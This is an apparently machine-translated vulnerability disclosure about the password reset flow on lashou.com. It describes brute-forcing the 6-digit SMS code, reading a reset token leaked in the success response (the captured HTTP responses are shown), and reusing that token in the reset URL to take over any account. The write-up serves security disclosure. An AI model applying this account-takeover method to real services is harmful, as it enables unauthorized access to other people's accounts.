Today, I found that I forgot my username when I log onto the hand in hand... then I detected it... I will test it with my own number... when logging in, click forgot password to go to the password retrieval page... select "retrieve via text message". After Entering the mobile phone number here, the target mobile phone will receive a 6-digit random verification code... packet Capture when you submit a verification code... get the following data... next, perform brute force cracking on the verification code... compare the return package... error package:
HTTP/1.1 200 OKDate: Sun, 21 Jul 2013 03:13:39 GMTContent-Type: text/html; charset=utf-8Connection: closeVary: Accept-EncodingExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheServer: LWSVia: web-1-50Vary: Accept-Encoding{"status":5,"msg":"\u9a8c\u8bc1\u7801\u9519\u8bef"}
Correct package:
HTTP/1.1 200 OKDate: Sun, 21 Jul 2013 03:13:39 GMTContent-Type: text/html; charset = utf-8Connection: closeVary: Accept-EncodingExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check = 0, pre-check = 0 Pragma: no-cacheServer: LWSVia: web-1-48Vary: accept-Encoding {"status": 1, "msg ": "MTg2MDA5M ******* I am a mosaic ********* NTc5MkB ********* jQxOXwzNDQwMDI3NTZkOTY4 ********** hMA % 3D % 3D "}
The correct verification code is obtained. However, after repeated tests, it is found that the verification code of the handle is only valid once. After you enter the verification code to the password modification page, if you return the verification code, it is no longer valid, in this way, the verification code we have cracked is invalid .... this is because I have used it once... is there really no way to break through here? When I decided to give up, I suddenly remembered a problem, that is, I used to reset the connection when I used my mailbox to retrieve the password... for example, the password can be reset as long as the connection is enabled. There is no limit on the number of valid times... and, http://www.lashou.com/account/reset? Code = [this code is very familiar here] After comparison, we found that it is the data in the data returned by the correct verification code During brute force guesses... directly combine to reset the password connection... http://www.lashou.com/account/reset? Code = MTg2MDA5M ******* I am a mosaic ******** NTc5MkB ********* jQxOXwzNDQwMDI3NTZkOTY4 ********* * The target user password can be reset after hMA % 3D % 3D access!
Solution:
It was originally intended to brute force crack the verification code and reset the user password, but it was found that the verification code was only valid once. You should understand this when you want to give up...